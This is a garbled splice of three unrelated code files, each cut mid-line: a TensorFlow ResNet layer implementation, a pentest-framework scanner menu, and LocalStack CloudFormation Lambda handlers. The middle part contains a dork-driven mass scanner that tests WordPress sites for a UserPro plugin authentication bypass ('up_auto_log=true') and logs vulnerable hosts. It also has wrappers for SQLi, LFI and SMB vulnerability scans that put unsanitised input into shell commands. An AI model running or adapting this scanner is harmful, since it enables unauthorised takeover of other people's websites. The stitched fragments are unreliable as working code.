self.bn2c = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv_shortcut = tf.keras.layers.Conv2D(filters3, kernel_size=(1, 1), strides=strides, use_bias=use_bias)
self.bn2_sc = tf.keras.layers.BatchNormalization(trainable=train_bn)
def build(self, input_shape):
self.built = True
super(ResnetConvBlock, self).build(input_shape)
def call(self, inputs, **kwargs):
x = self.conv2a(inputs)
x = self.bn2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x)
x = tf.nn.relu(x)
x = self.conv2c(x)
x = self.bn2c(x)
shortcut = self.conv_shortcut(inputs)
shortcut = self.bn2_sc(shortcut)
x += shortcut
return tf.nn.relu(x)
def get_config(self):
config = super(ResnetConvBlock, self).get_config()
config.update({'filters': self.filters, 'kernel_size': self.kernel_size, 'strides': self.strides})
return config
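# Shape sketch under assumed inputs: with filters=[64, 64, 256] and the
# default strides=(2, 2), a (n, 56, 56, 64) tensor comes out as
# (n, 28, 28, 256) -- the 1x1/3x3/1x1 bottleneck plus a strided 1x1
# projection on the shortcut:
#   block = ResnetConvBlock(filters=[64, 64, 256])
#   y = block(tf.zeros((1, 56, 56, 64)))  # -> (1, 28, 28, 256)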
@tf.keras.utils.register_keras_serializable()
class ResnetConvBlockSmall(tfl.Layer):
def __init__(self, filter_size, kernel_size=3, strides=(2, 2), use_bias=True,
train_bn=True, name='resnet_conv_block_small', **kwargs):
"""
Block for resnet18 and resnet34
Args:
filter_size:
kernel_size:
strides:
use_bias:
train_bn:
name:
**kwargs:
"""
super(ResnetConvBlockSmall, self).__init__(name=name, **kwargs)
self.filter_size = filter_size
self.kernel_size = kernel_size
self.strides = strides
self.conv2a = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=self.kernel_size, strides=strides,
use_bias=use_bias, padding='same')
self.bn2a = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2b = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=self.kernel_size,
use_bias=use_bias, padding='same')
self.bn2b = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv_shortcut = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=(1, 1), strides=strides,
use_bias=use_bias)
self.bn2_sc = tf.keras.layers.BatchNormalization(trainable=train_bn)
def build(self, input_shape):
self.built = True
super(ResnetConvBlockSmall, self).build(input_shape)
def call(self, inputs, **kwargs):
x = self.conv2a(inputs)
x = self.bn2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x)
x = tf.nn.relu(x)
shortcut = self.conv_shortcut(inputs)
shortcut = self.bn2_sc(shortcut)
x += shortcut
return tf.nn.relu(x)
def get_config(self):
config = super(ResnetConvBlockSmall, self).get_config()
config.update({'filter_size': self.filter_size, 'kernel_size': self.kernel_size, 'strides': self.strides})
return config
@tf.keras.utils.register_keras_serializable()
class ResnetIdentityBlock(tfl.Layer):
def __init__(self, filters, kernel_size=3, use_bias=True,
train_bn=True, name='resnet_identity_block', **kwargs):
"""
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
Args:
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
use_bias: Boolean. To use or not use a bias in conv layers.
name: block name
**kwargs:
"""
super(ResnetIdentityBlock, self).__init__(name=name, **kwargs)
self.filters = filters
self.kernel_size = kernel_size
filters1, filters2, filters3 = self.filters
self.conv2a = tf.keras.layers.Conv2D(filters=filters1, kernel_size=(1, 1), use_bias=use_bias)
self.bn2a = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2b = tf.keras.layers.Conv2D(filters=filters2, kernel_size=self.kernel_size, padding='same',
use_bias=use_bias)
self.bn2b = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2c = tf.keras.layers.Conv2D(filters=filters3, kernel_size=(1, 1), use_bias=use_bias)
self.bn2c = tf.keras.layers.BatchNormalization(trainable=train_bn)
def build(self, input_shape):
self.built = True
super(ResnetIdentityBlock, self).build(input_shape)
def call(self, inputs, **kwargs):
x = self.conv2a(inputs)
x = self.bn2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x)
x = tf.nn.relu(x)
x = self.conv2c(x)
x = self.bn2c(x)
x += inputs
return tf.nn.relu(x)
def get_config(self):
config = super(ResnetIdentityBlock, self).get_config()
config.update({'kernel_size': self.kernel_size, 'filters': self.filters})
return config
@tf.keras.utils.register_keras_serializable()
class ResNetIdentityBlockSmall(tfl.Layer):
def __init__(self, filter_size, kernel_size, use_bias=True,
train_bn=True, name='resnet_identity_block_small', **kwargs):
super(ResNetIdentityBlockSmall, self).__init__(name=name, **kwargs)
self.filter_size = filter_size
self.kernel_size = kernel_size
self.conv2a = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=self.kernel_size, use_bias=use_bias)
self.bn2a = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2b = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=self.kernel_size, use_bias=use_bias)
self.bn2b = tf.keras.layers.BatchNormalization(trainable=train_bn)
def build(self, input_shape):
self.built = True
super(ResNetIdentityBlockSmall, self).build(input_shape)
def call(self, inputs, **kwargs):
x = self.conv2a(inputs)
x = self.bn2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x)
x += inputs
return tf.nn.relu(x)
def get_config(self):
config = super(ResNetIdentityBlockSmall, self).get_config()
config.update({'filter_size': self.filter_size, 'kernel_size': self.kernel_size, })
return config
@tf.keras.utils.register_keras_serializable()
class ResNetLayer(tfl.Layer):
def __init__(self, resnet_type, train_bn, name='resnet_layer', stage5=False, **kwargs):
"""
Build a ResNet graph. https://arxiv.org/pdf/1512.03385.pdf
Args:
resnet_type: model type
name:
train_bn:
stage5:
**kwargs:
"""
super(ResNetLayer, self).__init__(name=name, **kwargs)
self.resnet_type = resnet_type
self.stage5 = stage5
self.stage4_identity_count = {
'resnet18': 1,
'resnet34': 5,
'resnet50': 5,
'resnet101': 22}
assert self.resnet_type in [f'resnet{i}' for i in [18, 34, 50, 101]]
# Stage 1
self.zero_pad = tfl.ZeroPadding2D((3, 3))
self.conv1 = tfl.Conv2D(filters=64, kernel_size=(7, 7), strides=(2, 2), name='conv1', use_bias=True)
self.bn_conv1 = tfl.BatchNormalization(name='bn_conv1', trainable=train_bn)
self.maxpool1 = tfl.MaxPooling2D((3, 3), strides=(2, 2), padding="same")
self.relu = tfl.Activation('relu')
self.stages_dict = dict()
if self.resnet_type in ['resnet50', 'resnet101']:
# Stage 2
self.resnet_conv2a = ResnetConvBlock(filters=[64, 64, 256], kernel_size=3, strides=(1, 1),
train_bn=train_bn,
name='resnet_conv2a')
self.resnet_identity2b = ResnetIdentityBlock(filters=[64, 64, 256], kernel_size=3, train_bn=train_bn,
name='resnet_identity2b')
self.resnet_identity2c = ResnetIdentityBlock(filters=[64, 64, 256], kernel_size=3, train_bn=train_bn,
name='resnet_identity2c')
# Stage 3
self.resnet_conv3a = ResnetConvBlock(filters=[128, 128, 512], kernel_size=3, train_bn=train_bn,
name='resnet_conv3a')
self.resnet_identity3b = ResnetIdentityBlock(filters=[128, 128, 512], kernel_size=3, train_bn=train_bn,
name='resnet_identity3b')
self.resnet_identity3c = ResnetIdentityBlock(filters=[128, 128, 512], kernel_size=3, train_bn=train_bn,
name='resnet_identity3c')
self.resnet_identity3d = ResnetIdentityBlock(filters=[128, 128, 512], kernel_size=3, train_bn=train_bn,
name='resnet_identity3d')
# Stage 4
self.resnet_conv4a = ResnetConvBlock(filters=[256, 256, 1024], kernel_size=3, train_bn=train_bn)
self.resnet_identity4_list = []
for i in range(self.stage4_identity_count[self.resnet_type]):
self.resnet_identity4_list.append(ResnetIdentityBlock(
filters=[256, 256, 1024], kernel_size=3, train_bn=train_bn)
)
# Stage 5
if self.stage5:
self.resnet_conv5a = ResnetConvBlock(filters=[512, 512, 2048], kernel_size=3, train_bn=train_bn)
self.resnet_identity5b = ResnetIdentityBlock(filters=[512, 512, 2048], kernel_size=3, train_bn=train_bn)
self.resnet_identity5c = ResnetIdentityBlock(filters=[512, 512, 2048], kernel_size=3, train_bn=train_bn)
elif self.resnet_type == 'resnet34':
# Stage 2
self.resnet_conv2a = ResnetConvBlockSmall(
filter_size=64, kernel_size=3, strides=(1, 1), train_bn=True, name='resnet_conv2a')
self.resnet_identity2b = ResNetIdentityBlockSmall(
filter_size=64, kernel_size=1, train_bn=True, name='resnet_identity2b')
self.resnet_identity2c = ResNetIdentityBlockSmall(
filter_size=64, kernel_size=1, train_bn=True, name='resnet_identity2c')
# Stage 3
self.resnet_conv3a = ResnetConvBlockSmall(
filter_size=128, kernel_size=3, train_bn=True, name='resnet_conv3a')
self.resnet_identity3b = ResNetIdentityBlockSmall(
filter_size=128, kernel_size=1, train_bn=True, name='resnet_identity3b')
self.resnet_identity3c = ResNetIdentityBlockSmall(
filter_size=128, kernel_size=1, train_bn=True, name='resnet_identity3c')
self.resnet_identity3d = ResNetIdentityBlockSmall(
filter_size=128, kernel_size=1, train_bn=True, name='resnet_identity3d')
# Stage 4
self.resnet_conv4a = ResnetConvBlockSmall(
filter_size=256, kernel_size=3, train_bn=True, name='resnet_conv4a')
self.resnet_identity4_list = []
for i in range(self.stage4_identity_count[self.resnet_type]):
self.resnet_identity4_list.append(
ResNetIdentityBlockSmall(filter_size=256, kernel_size=1, train_bn=True))
# Stage 5
if self.stage5:
self.resnet_conv5a = ResnetConvBlockSmall(
filter_size=512, kernel_size=3, train_bn=True, name='resnet_conv5a')
self.resnet_identity5b = ResNetIdentityBlockSmall(
filter_size=512, kernel_size=1, train_bn=True, name='resnet_identity5b')
self.resnet_identity5c = ResNetIdentityBlockSmall(
filter_size=512, kernel_size=1, train_bn=True, name='resnet_identity5c')
elif self.resnet_type == 'resnet18':
# Stage 2
self.resnet_conv2a = ResnetConvBlockSmall(
filter_size=64, kernel_size=3, strides=(1, 1), train_bn=True, name='resnet_conv2a')
self.resnet_identity2b = ResNetIdentityBlockSmall(
filter_size=64, kernel_size=1, train_bn=True, name='resnet_identity2b')
# Stage 3
self.resnet_conv3a = ResnetConvBlockSmall(
filter_size=128, kernel_size=3, train_bn=True, name='resnet_conv3a')
self.resnet_identity3b = ResNetIdentityBlockSmall(
filter_size=128, kernel_size=1, train_bn=True, name='resnet_identity3b')
# Stage 4
self.resnet_conv4a = ResnetConvBlockSmall(filter_size=256, kernel_size=3, train_bn=True,
name='resnet_conv4a')
self.resnet_identity4b = ResNetIdentityBlockSmall(filter_size=256, kernel_size=1, train_bn=True,
name='resnet_identity4b')
# Stage 5
if self.stage5:
self.resnet_conv5a = ResnetConvBlockSmall(
filter_size=512, kernel_size=3, train_bn=True, name='resnet_conv5a')
self.resnet_identity5b = ResNetIdentityBlockSmall(
filter_size=512, kernel_size=1, train_bn=True, name='resnet_identity5b')
def build(self, input_shape):
self.built = True
super(ResNetLayer, self).build(input_shape)
def call(self, inputs, **kwargs):
# outputs comments here are for paper resize 224x224
features_dict = {}
# Stage 1
x = self.zero_pad(inputs)
x = self.conv1(x)
x = self.bn_conv1(x)
x = self.relu(x)
x = self.maxpool1(x) # output: (n, 56, 56, 64)
features_dict.update({'C1': x})
if self.resnet_type in ['resnet50', 'resnet101']:
# Stage 2
x = self.resnet_conv2a(x)
x = self.resnet_identity2b(x)
x = self.resnet_identity2c(x) # output: (n, 56, 56, 256)
features_dict.update({'C2': x})
# Stage 3
x = self.resnet_conv3a(x)
x = self.resnet_identity3b(x)
x = self.resnet_identity3c(x)
x = self.resnet_identity3d(x) # output: (n, 28, 28, 512)
features_dict.update({'C3': x})
# Stage 4
x = self.resnet_conv4a(x)
for layer in self.resnet_identity4_list:
x = layer(x)
# output: (1, 14, 14, 1024)
features_dict.update({'C4': x})
# Stage 5
features_dict.update({'C5': None})
if self.stage5:
x = self.resnet_conv5a(x)
x = self.resnet_identity5b(x)
x = self.resnet_identity5c(x) # output: # (n, 7, 7, 2048)
features_dict.update({'C5': x})
elif self.resnet_type == 'resnet34':
# Stage 2
x = self.resnet_conv2a(x)
x = self.resnet_identity2b(x)
x = self.resnet_identity2c(x)
features_dict.update({'C2': x}) # output: (n, 56, 56, 64)
# Stage 3
x = self.resnet_conv3a(x)
x = self.resnet_identity3b(x)
if (element.startswith("https://")):
element = element[8:]
if (element.startswith("www.")):
element = element[4:]
element = element.split("/")[0]
element = "http://" + element
print(("checking "+element+" :"))
if (checkwp(element)):
suc = str(checkVul(element))
if( suc=="True"):
try:
filee = open("priv8.txt", mode="a+")
filee.write(element+"\n")
filee.close()
except:
print((""+R+"error"+N+""))
print (suc)
else:
print((""+R+"False"+N+""))
else:
print((element + ""+R+" =>"+N+" " + str(checkwp(element))))
def checkwp(url):
url+="/wp-content/plugins/userpro/css/userpro.min.css"
try:
pURL = urlopen(url).read().decode('utf-8', 'ignore')
except:
return False
if (pURL.find(".userpro")>-1):
print((""+B+"[!] "+N+" Plugin is installed checking vulnerable...\n"))
return True
else:
return False
def checkVul(url):
url1=url + "/?up_auto_log=true"
try:
pURL = urlopen(url1).read().decode('utf-8', 'ignore')
if (pURL.find("admin-bar-css")>-1):
return True
elif (urlopen(url + "/wp-admin").read().decode('utf-8', 'ignore').find("admin-bar-css")>-1):
return True
else :return False
except:
return False
while(True):
x = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/usr_pro_wordpress_auto_find (set Dork)"+N+"): ")
print("DORKS => " + R, x)
n = int(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/usr_pro_wordpress_auto_find (start number)"+N+"): "))
print("START NUMBER => " + R, n)
g = int(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/usr_pro_wordpress_auto_find (set end_number)"+N+"): "))
print("END NUMBER => " + R, g)
run = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/usr_pro_wordpress_auto_find"+N+"): ")
if run == "run":
print((""+B+"[*] "+N+"Starting attacks..."))
while(True):
tracker(x, n)
y = input(""+B+"[*]"+N+" Next (y/n)?")
if(y=="y"):
n += g
tracker(x, n)
else:
core.menu.scan()
y1 = input(""+B+"[*]"+N+" Another dork (y/n) ?")
if (y1 == "y"):
continue
else:
core.menu.scan()
elif wor == 'clear':
clean()
wordpress()
elif wor =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", wor))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress()
pass
def cms():
while True:
cs = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/cms_war "+N+"): ")
if cs == 'show options':
help.option()
cms()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif cs == 'set target':
tops = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/cms_war (set target)"+N+"): ")
print("target => " + R, tops)
print((""+N+"=> "+R+"scan "+N+"[dir, shell, backup, files, admin]"))
ray = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/cms_war (scan)"+N+"): ")
run_cmd = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/cms_war"+N+"): ")
if run_cmd == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd scanner;python scanner.py %s -m %s" % (tops,ray))
print((""+B+"[*]"+N+" Job finished!"))
print()
cms()
else:
cms()
elif cs =='back':
core.menu.scan()
elif cs =='clear':
clean()
cms()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
cms()
pass
def drupal_scan():
cs = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/drupal_scan "+N+"): ")
if cs == 'show options':
help.option()
drupal_scan()
elif cs == 'set target':
ip = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/drupal_scan "+G+"(set target)"+G+"): ")
print('Start scan target %s' % ip)
os.system("droopescan scan drupal -u %s" % (ip))
drupal_scan()
elif cs =='back':
core.menu.scan()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif cs =='clear':
clean()
drupal_scan()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
drupal_scan()
pass
def wordpress1():
cs = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_scan "+N+"): ")
if cs == 'show options':
help.option()
wordpress1()
elif cs == 'set target':
ip = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_scan "+G+"(set target)"+G+"): ")
os.system("droopescan scan wordpress -u %s" % (ip))
wordpress1()
elif cs =='back':
core.menu.scan()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif cs =='clear':
clean()
wordpress1()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress1()
pass
def wordpress_scan():
while True:
sec = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_user_scanners"+N+"): ")
if sec == 'show options':
help.option()
wordpress_scan()
elif sec =='back':
core.menu.scan()
elif sec =='set target':
wop = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_user_scanners (target)"+N+"): ")
enum = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_user_scanners (user)"+N+"): ")
uiop = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_user_scanners"+N+"): ")
if uiop == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd wscan;python wpscanner.py -s %s -n %s" % (wop,enum))
print((""+B+"[*]"+N+" Job finished!"))
print()
wordpress_scan()
else:
wordpress_scan()
elif sec == 'clear':
clean()
wordpress_scan()
elif sec =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", sec))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress_scan()
pass
def dirse():
while True:
dir = input("Pentest>> ("+B+"modules/scanners)("+R+"scanner/dir_search"+N+"): ")
if dir == 'show options':
help.option()
dirse()
elif dir =='back':
core.menu.scan()
elif dir =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif dir == 'set target':
ym = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/dir_search (set target)"+N+"): ")
print("target => " + R, ym)
puki = input("Pentest>> ("+B+"modules/scanners)("+R+"scanner/dir_search (set extensions)"+N+"): ")
dih = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/dir_search"+N+"): ")
if dih == "run":
os.system("python3 modules/dirsearch/dirsearch.py -u %s -e %s" % (ym,puki))
print((""+B+"[*]"+N+" Job finished!"))
print()
dirse()
else:
dirse()
elif dir =='clear':
clean()
dirse()
else:
print(("Wrong Command => ", dir))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
dirse()
pass
def lfi():
while True:
lf = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/lfi_scanner"+N+"): ")
if lf == 'show options':
help.option()
lfi()
elif lf =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif lf == 'back':
core.menu.scan()
elif lf == 'set target':
os.system("cd modules;cd lfi_scanners;perl lfi_scanner.pl")
print((""+B+"[*]"+N+" Job finished!"))
print()
lfi()
elif lf == 'clear':
clean()
lfi()
else:
print(("Wrong Command => ", lf))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
lfi()
pass
def port():
while True:
os.system("python modules/port_scanners/port.py")
print((""+B+"[*]"+N+" Job finished!"))
print()
core.menu.scan()
pass
def joomla_sql():
while True:
jo = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_sqli_scanners"+N+"): ")
if jo == 'show options':
help.option()
joomla_sql()
elif jo == 'back':
core.menu.scan()
elif jo == 'set target':
q = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_sqli_scanners (set target)"+N+"): ")
print("list web => " + R, q)
m = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_sqli_scanners"+N+"): ")
if m == "run":
print((""+B+"[*] "+N+"Starting attacks..."))
os.system("cd modules;cd joomla_sqli_scanners;python joomsql.py %s" % (q))
print()
joomla_sql()
else:
joomla_sql()
elif jo == 'clear':
clean()
joomla_sql()
elif jo =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", jo))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
joomla_sql()
pass
def joomscan():
while True:
jaa = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/jomscan_v4"+N+"): ")
if jaa == 'show options':
help.option()
joomscan()
elif jaa =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif jaa == 'back':
core.menu.scan()
elif jaa == 'set target':
ops = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/jomscan_v4 (target)"+N+"): ")
print("target => " + R, ops)
rup = input(""+N+"(Pentest)> ("+B+"modules/scanners)("+R+"scanner/jomscan_v4"+N+"): ")
if rup == "run":
print((""+B+"[*]"+N+" Starting Attacks..."))
os.system("cd modules;cd joomscan_v4;python scan.py %s" % (ops))
print((""+B+"[*]"+N+" Job finished!"))
print()
joomscan()
else:
joomscan()
elif jaa =='clear':
clean()
joomscan()
else:
print(("Wrong Command => ", jaa))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
joomscan()
pass
def scan_v3():
while True:
try:
se = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"joomla_scanners_v3"+N+"): ")
if se == 'show options':
help.option()
scan_v3()
elif se =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif se == 'back':
core.menu.scan()
elif se == 'set target':
x = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_scanners_v3"+G+" (set target)"+N+"): ")
print("target => " + R, x)
i = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"joomla_scanners_v3"+N+"): ")
if i == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd joomscan_v3;python joomlascanner.py %s" % (x))
print((""+B+"[*]"+N+" Job finished!"))
print()
scan_v3()
else:
scan_v3()
elif se =='clear':
clean()
scan_v3()
else:
print(("Wrong Command => ", se))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
scan_v3()
pass
except(KeyboardInterrupt):
scan_v3()
def scan_v2():
while True:
try:
v2 = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_scanners_v.2"+N+"): ")
if v2 == 'show options':
help.option()
scan_v2()
elif v2 =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif v2 == 'back':
core.menu.scan()
elif v2 == 'set target':
p = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_scanners_v.2 (set target)"+N+"): ")
print("target => " + R, p)
o = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_scanners_v.2"+N+"): ")
if o == "run":
os.system("cd modules;cd joomscan_v2;python joomlascan2.py %s" % (p))
print((""+B+"[*]"+N+" Job finished!"))
print()
scan_v2()
else:
scan_v2()
elif v2 =='clear':
clean()
scan_v2()
else:
print(("Wrong Command => ", v2))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
scan_v2()
pass
except(KeyboardInterrupt):
scan_v2()
def jomvull():
while True:
try:
j = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_vulnerability_scanners"+N+"): ")
if j == 'show options':
help.option()
jomvull()
elif j =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif j == 'back':
core.menu.scan()
elif j == 'set target':
os.system("cd modules;cd joomscan;perl joomlavulnerability.pl")
print((""+B+"[*]"+N+" Job finished!"))
print()
jomvull()
elif j =='clear':
clean()
jomvull()
else:
print(("Wrong Command => ", j))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
jomvull()
pass
except(KeyboardInterrupt):
jomvull()
def jdown():
while True:
a = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/jdownloads_scanners"+N+"): ")
if a == 'show options':
help.option()
jdown()
elif a =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif a == 'back':
core.menu.scan()
elif a == 'set target':
li = input(""+N+"(list)> ("+B+"modules/scanners)("+R+"scanner/jdownloads_scanners (set target)"+N+"): ")
print("list => " + R, li)
ruu = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/jdownloads_scanners"+N+"): ")
if ruu == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd jdownloads_scanner;perl jdownloads_scanner.pl %s" % (li))
print((""+B+"[*]"+N+" Job finished!"))
print()
jdown()
else:
jdown()
elif a == 'clear':
clean()
jdown()
else:
print(("Wrong Command => ", a))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
jdown()
pass
def smb():
while True:
map = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/smb_scanning"+N+"): ")
if map == 'show options':
help.option()
smb()
elif map =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif map == 'back':
core.menu.scan()
elif map =='set target':
target = input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/smb_scanning ("+G+"set target)"+N+"): ")
print("Target => " + R, target)
ta = input("Pentest>> ("+B+"modules/scanners)("+R+"scanner/smb_scanning"+N+"): ")
if ta == "run":
scan = os.popen("nmap -p- --script=modules/nse/smb.nse " + target + " -Pn").read()
save = open('log/nmap_vuln.txt','w')
save.write(scan)
save.close()
vuln = os.popen("cat log/nmap_vuln.txt " ).read()
table= [['vulnerable scan result'],[vuln]]
print((tabulate(table,tablefmt="fancy_grid",headers="firstrow")))
smb()
else:
smb()
elif map =='clear':
clean()
smb()
k in props])
update_props = self.resolve_refs_recursively(stack_name, update_props, resources)
if 'Timeout' in update_props:
update_props['Timeout'] = int(update_props['Timeout'])
if 'Code' in props:
code = props['Code'] or {}
if not code.get('ZipFile'):
LOG.debug('Updating code for Lambda "%s" from location: %s' % (props['FunctionName'], code))
client.update_function_code(FunctionName=props['FunctionName'], **code)
if 'Environment' in update_props:
environment_variables = update_props['Environment'].get('Variables', {})
update_props['Environment']['Variables'] = {k: str(v) for k, v in environment_variables.items()}
return client.update_function_configuration(**update_props)
@staticmethod
def get_deploy_templates():
def get_lambda_code_param(params, **kwargs):
code = params.get('Code', {})
zip_file = code.get('ZipFile')
if zip_file and not is_base64(zip_file):
tmp_dir = new_tmp_dir()
handler_file = get_handler_file_from_name(params['Handler'], runtime=params['Runtime'])
tmp_file = os.path.join(tmp_dir, handler_file)
save_file(tmp_file, zip_file)
# add 'cfn-response' module to archive - see:
# https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/cfn-lambda-function-code-cfnresponsemodule.html
cfn_response_tmp_file = get_cfn_response_mod_file()
cfn_response_mod_dir = os.path.join(tmp_dir, 'node_modules', 'cfn-response')
mkdir(cfn_response_mod_dir)
cp_r(cfn_response_tmp_file, os.path.join(cfn_response_mod_dir, 'index.js'))
# create zip file
zip_file = create_zip_file(tmp_dir, get_content=True)
code['ZipFile'] = zip_file
rm_rf(tmp_dir)
return code
def get_delete_params(params, **kwargs):
return {'FunctionName': params.get('FunctionName')}
return {
'create': {
'function': 'create_function',
'parameters': {
'FunctionName': 'FunctionName',
'Runtime': 'Runtime',
'Role': 'Role',
'Handler': 'Handler',
'Code': get_lambda_code_param,
'Description': 'Description',
'Environment': 'Environment',
'Timeout': 'Timeout',
'MemorySize': 'MemorySize',
'Layers': 'Layers'
# TODO add missing fields
},
'defaults': {
'Role': 'test_role'
},
'types': {
'Timeout': int,
'MemorySize': int
}
},
'delete': {
'function': 'delete_function',
'parameters': get_delete_params
}
}
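# Rough sketch of how a deploy template of this shape might be consumed
# (illustrative only; not LocalStack's actual dispatch code): each entry
# under 'parameters' either names the CloudFormation property to copy
# verbatim, or supplies a callable such as get_lambda_code_param that
# derives the boto3 argument from the raw properties.
#   def build_kwargs(template, props):
#       kwargs = {}
#       for arg, source in template['create']['parameters'].items():
#           value = source(props) if callable(source) else props.get(source)
#           if value is not None:
#               kwargs[arg] = value
#       return kwargs  # then: client.create_function(**kwargs)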
class LambdaFunctionVersion(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::Version'
def fetch_state(self, stack_name, resources):
name = self.resolve_refs_recursively(stack_name, self.props.get('FunctionName'), resources)
if not name:
return None
func_name = aws_stack.lambda_function_name(name)
func_version = name.split(':')[7] if len(name.split(':')) > 7 else '$LATEST'
versions = aws_stack.connect_to_service('lambda').list_versions_by_function(FunctionName=func_name)
return ([v for v in versions['Versions'] if v['Version'] == func_version] or [None])[0]
class LambdaEventSourceMapping(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::EventSourceMapping'
def fetch_state(self, stack_name, resources):
props = self.props
resource_id = props['FunctionName'] or self.resource_id
source_arn = props.get('EventSourceArn')
resource_id = self.resolve_refs_recursively(stack_name, resource_id, resources)
source_arn = self.resolve_refs_recursively(stack_name, source_arn, resources)
if not resource_id or not source_arn:
raise Exception('ResourceNotFound')
mappings = aws_stack.connect_to_service('lambda').list_event_source_mappings(
FunctionName=resource_id, EventSourceArn=source_arn)
mapping = list(filter(lambda m:
